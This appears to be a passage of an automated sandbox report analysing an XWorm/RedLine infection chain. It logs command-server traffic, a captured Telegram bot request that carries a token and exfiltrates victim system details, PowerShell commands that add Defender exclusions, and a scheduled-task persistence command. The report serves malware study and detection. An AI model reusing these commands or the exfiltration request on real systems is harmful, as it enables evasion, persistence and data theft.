Apr 24, 2024 02:53:03.649075031 CEST	49718	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:03.947155952 CEST	9078	49718	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:08.962737083 CEST	49719	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:09.260902882 CEST	9078	49719	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:09.836529016 CEST	49719	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:10.134665966 CEST	9078	49719	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:10.649034977 CEST	49719	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:10.947237968 CEST	9078	49719	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:11.623497009 CEST	49719	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:11.921526909 CEST	9078	49719	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:12.445899963 CEST	49719	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:12.743997097 CEST	9078	49719	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:14.595590115 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:14.595638990 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:14.595721006 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:14.606385946 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:14.606436014 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.223624945 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.223707914 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:15.226866007 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:15.226877928 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.227195024 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.274058104 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:15.365418911 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:15.408123970 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.845031977 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.845104933 CEST	443	49720	149.154.167.220	192.168.2.9
Apr 24, 2024 02:53:15.845313072 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:15.853522062 CEST	49720	443	192.168.2.9	149.154.167.220
Apr 24, 2024 02:53:17.760293961 CEST	49722	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:18.059451103 CEST	9078	49722	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:18.570923090 CEST	49722	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:18.869373083 CEST	9078	49722	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:19.383429050 CEST	49722	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:19.681889057 CEST	9078	49722	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:20.195955992 CEST	49722	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:20.494421959 CEST	9078	49722	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:21.008621931 CEST	49722	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:21.312664032 CEST	9078	49722	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:24.701304913 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:24.996232033 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:24.996376991 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:25.070862055 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:25.406569004 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:26.369366884 CEST	49726	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:26.668051958 CEST	9078	49726	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:27.180422068 CEST	49726	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:27.478863001 CEST	9078	49726	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:27.992880106 CEST	49726	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:28.291834116 CEST	9078	49726	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:28.805489063 CEST	49726	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:29.104935884 CEST	9078	49726	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:29.617845058 CEST	49726	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:29.916114092 CEST	9078	49726	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:30.385946989 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:30.430411100 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:34.932045937 CEST	49727	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:35.230264902 CEST	9078	49727	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:35.742959023 CEST	49727	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:36.041388988 CEST	9078	49727	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:36.555454016 CEST	49727	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:36.853954077 CEST	9078	49727	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:37.367917061 CEST	49727	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:37.666484118 CEST	9078	49727	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:38.180459023 CEST	49727	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:38.478678942 CEST	9078	49727	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:39.286910057 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:39.583122015 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:39.587100983 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:39.923743010 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:43.496412039 CEST	49728	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:43.794845104 CEST	9078	49728	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:44.305404902 CEST	49728	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:44.603785038 CEST	9078	49728	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:45.118077040 CEST	49728	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:45.416704893 CEST	9078	49728	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:45.930463076 CEST	49728	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:46.228830099 CEST	9078	49728	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:46.742892981 CEST	49728	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:47.041373014 CEST	9078	49728	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:52.056714058 CEST	49729	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:52.354768991 CEST	9078	49729	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:52.868024111 CEST	49729	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:53.166007996 CEST	9078	49729	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:53.493336916 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:53.680401087 CEST	49729	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:53.789870024 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:53.792898893 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:53.978307009 CEST	9078	49729	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:54.128608942 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:54.492954969 CEST	49729	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:54.791373014 CEST	9078	49729	91.92.252.220	192.168.2.9
Apr 24, 2024 02:53:55.305439949 CEST	49729	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:53:55.603450060 CEST	9078	49729	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:00.388941050 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:00.430573940 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:00.619795084 CEST	49730	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:00.918049097 CEST	9078	49730	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:01.430522919 CEST	49730	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:01.731479883 CEST	9078	49730	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:02.242932081 CEST	49730	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:02.541722059 CEST	9078	49730	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:03.055443048 CEST	49730	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:03.355508089 CEST	9078	49730	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:03.868119955 CEST	49730	9078	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:04.169194937 CEST	9078	49730	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:08.926527977 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:09.223298073 CEST	7000	49725	91.92.252.220	192.168.2.9
Apr 24, 2024 02:54:09.229918957 CEST	49725	7000	192.168.2.9	91.92.252.220
Apr 24, 2024 02:54:09.564834118 CEST	7000	49725	91.92.252.220	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 02:51:59.936486006 CEST	60165	53	192.168.2.9	1.1.1.1
Apr 24, 2024 02:52:00.091031075 CEST	53	60165	1.1.1.1	192.168.2.9
Apr 24, 2024 02:53:14.440305948 CEST	50799	53	192.168.2.9	1.1.1.1
Apr 24, 2024 02:53:14.594491959 CEST	53	50799	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 02:51:59.936486006 CEST	192.168.2.9	1.1.1.1	0x4c07	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 02:53:14.440305948 CEST	192.168.2.9	1.1.1.1	0x532f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 02:52:00.091031075 CEST	1.1.1.1	192.168.2.9	0x4c07	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Apr 24, 2024 02:53:14.594491959 CEST	1.1.1.1	192.168.2.9	0x532f	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	208.95.112.1	80	7468	C:\ProgramData\XClient.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 02:52:00.260536909 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 24, 2024 02:52:00.420644045 CEST	175	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 00:51:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49720	149.154.167.220	443	7468	C:\ProgramData\XClient.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 00:53:15 UTC	443	OUT	GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-04-24 00:53:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 24 Apr 2024 00:53:15 GMT Content-Type: application/json Content-Length: 439 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-04-24 00:53:15 UTC	439	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 32 31 32 38 39 38 38 34 32 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 4f 54 4e 45 54 48 41 43 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 65 73 68 6f 6d 61 6e 64 6f 68 61 63 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 36 36 36 34 39 36 37 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 30 2e 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 70 65 67 61 6c 65 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 33 39 31 39 39 39 35 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 Data Ascii: {"ok":true,"result":{"message_id":2851,"from":{"id":2128988424,"is_bot":true,"first_name":"BOTNETHACK","username":"beshomandohack_bot"},"chat":{"id":966649672,"first_name":".0.0","username":"spegalex","type":"private"},"date":1713919995,"text":"\u2620 [XW

Target ID:	1
Start time:	02:51:54
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\Output.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Output.exe"
Imagebase:	0x130000
File size:	200'704 bytes
MD5 hash:	EDD7441051BBF509EF1052D9F2A02C8F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:51:55
Start date:	24/04/2024
Path:	C:\ProgramData\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\XClient.exe"
Imagebase:	0x7b0000
File size:	85'504 bytes
MD5 hash:	5B7AC9829CDCA0B5E82604191DCC1D4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2585450577.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2585450577.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2585450577.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 69%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:51:55
Start date:	24/04/2024
Path:	C:\ProgramData\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\build.exe"
Imagebase:	0x340000
File size:	97'792 bytes
MD5 hash:	D32BDDD3639F42733A78945885002128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\build.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\build.exe, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\ProgramData\build.exe, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\ProgramData\build.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 79%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:51:55
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:51:59
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:51:59
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:52:05
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:52:05
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:52:20
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'
Imagebase:	0x7ff70f010000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:52:20
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:52:40
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:52:40
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:53:12
Start date:	24/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"
Imagebase:	0x7ff6e8690000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:53:12
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:53:13
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\Temp\mstc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\mstc.exe
Imagebase:	0x780000
File size:	85'504 bytes
MD5 hash:	5B7AC9829CDCA0B5E82604191DCC1D4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\mstc.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 69%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:53:26
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\Temp\mstc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\mstc.exe"
Imagebase:	0x20000
File size:	85'504 bytes
MD5 hash:	5B7AC9829CDCA0B5E82604191DCC1D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:53:34
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\Temp\mstc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\mstc.exe"
Imagebase:	0xdd0000
File size:	85'504 bytes
MD5 hash:	5B7AC9829CDCA0B5E82604191DCC1D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00007FF886E20D80 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF886E20E38

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 7549c86b546e0d634f8df1ef295cbb1c1eefa2440b25b66cdbac32ce5fd6c603
Instruction ID: 946cc9664bcead13b67477ec0e63d0a10a896f9f6538b9351010ef980dae1935
Opcode Fuzzy Hash: 7549c86b546e0d634f8df1ef295cbb1c1eefa2440b25b66cdbac32ce5fd6c603
Instruction Fuzzy Hash: 0631A96284E3C24FC70397749C664E07FB0AE43220B0E40EBD8C5CB5E3D50C6A9AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E210ED Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1321933451.00007FF886E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff886e20000_Output.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b05bb0951c891b84a0789edc38aaf0caf2b73029f6f29b7f79399a0d63de53
Instruction ID: 7bf363eb673aa7222e63d205a9aa13ef19c36a79af926dc6164032122189d82c
Opcode Fuzzy Hash: 80b05bb0951c891b84a0789edc38aaf0caf2b73029f6f29b7f79399a0d63de53
Instruction Fuzzy Hash: A031E521E0CAC84FE785A7685C697F97BE2FF9A645B0800BBE44DC7293DE189C05C302

Uniqueness

Uniqueness Score: -1.00%

